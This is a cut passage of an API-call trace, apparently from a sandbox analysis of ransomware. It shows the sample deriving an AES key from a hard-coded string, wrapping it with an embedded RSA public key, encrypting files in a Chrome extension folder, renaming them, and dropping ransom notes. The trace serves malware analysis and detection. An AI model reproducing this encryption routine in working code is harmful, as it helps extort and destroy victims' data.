1 [0260.799] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.799] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.799] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.799] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\readme_back_files.htm")) returned 0xffffffff [0260.800] AreFileApisANSI () returned 1 [0260.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0260.800] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.801] GetFileType (hFile=0x5d60) returned 0x1 [0260.801] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.802] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.802] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0260.802] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.802] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.802] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.802] GetLastError () returned 0x0 [0260.802] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json")) returned 0x20 [0260.803] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x80) returned 1 [0260.803] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.804] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.805] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.805] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.808] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.808] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0260.808] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.808] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c900) returned 1 [0260.808] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.808] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.808] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e70f30) returned 1 [0260.809] CryptImportPublicKeyInfo (in: hCryptProv=0x2e70f30, dwCertEncodingType=0x1, pInfo=0x2eac3e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eac410*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eac418*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d180) returned 1 [0260.809] CryptEncrypt (in: hKey=0x2e7d180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.809] CryptEncrypt (in: hKey=0x2e7d180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e71040*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e71040*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.809] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e71040*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e71040*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.810] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xf9, lpOverlapped=0x0) returned 1 [0260.811] CryptEncrypt (in: hKey=0x2e7c900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xf9, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0260.811] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0260.811] CloseHandle (hObject=0x5d5c) returned 1 [0260.811] CloseHandle (hObject=0x5d64) returned 1 [0260.812] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json"), bFailIfExists=0) returned 1 [0260.815] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x0) returned 1 [0260.815] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json.gsg")) returned 1 [0260.816] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json.fuck")) returned 1 [0260.818] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0260.818] CryptDestroyKey (hKey=0x2e7c900) returned 1 [0260.818] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.818] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.818] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0260.818] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\readme_back_files.htm")) returned 0xffffffff [0260.818] AreFileApisANSI () returned 1 [0260.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0260.818] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.819] GetFileType (hFile=0x5d60) returned 0x1 [0260.819] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.821] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0260.821] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0260.821] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\readme_back_files.htm")) returned 0xffffffff [0260.821] AreFileApisANSI () returned 1 [0260.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 150 [0260.821] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0260.822] GetFileType (hFile=0x5d50) returned 0x1 [0260.822] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0260.823] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0260.824] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2e7fc00 [0260.824] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.824] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.825] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0260.825] GetLastError () returned 0x0 [0260.825] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json")) returned 0x20 [0260.825] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json", dwFileAttributes=0x80) returned 1 [0260.825] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.826] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.828] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.gsg", dwFileAttributes=0x2) returned 1 [0260.828] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7b4f0) returned 1 [0260.830] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0260.830] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0260.830] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.830] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7ce40) returned 1 [0260.831] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.831] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0260.831] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e6e5c0) returned 1 [0260.831] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6e5c0, dwCertEncodingType=0x1, pInfo=0x2eac310*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eac340*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eac348*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7c900) returned 1 [0260.831] CryptEncrypt (in: hKey=0x2e7c900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0260.831] CryptEncrypt (in: hKey=0x2e7c900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6eb10*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e6eb10*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0260.831] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e6eb10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e6eb10*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0260.832] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.010] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.011] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.064] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.065] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.065] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.065] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.065] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.065] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.065] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.065] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.065] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.065] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.065] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.065] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.066] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.066] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.066] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.066] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.066] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.066] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, 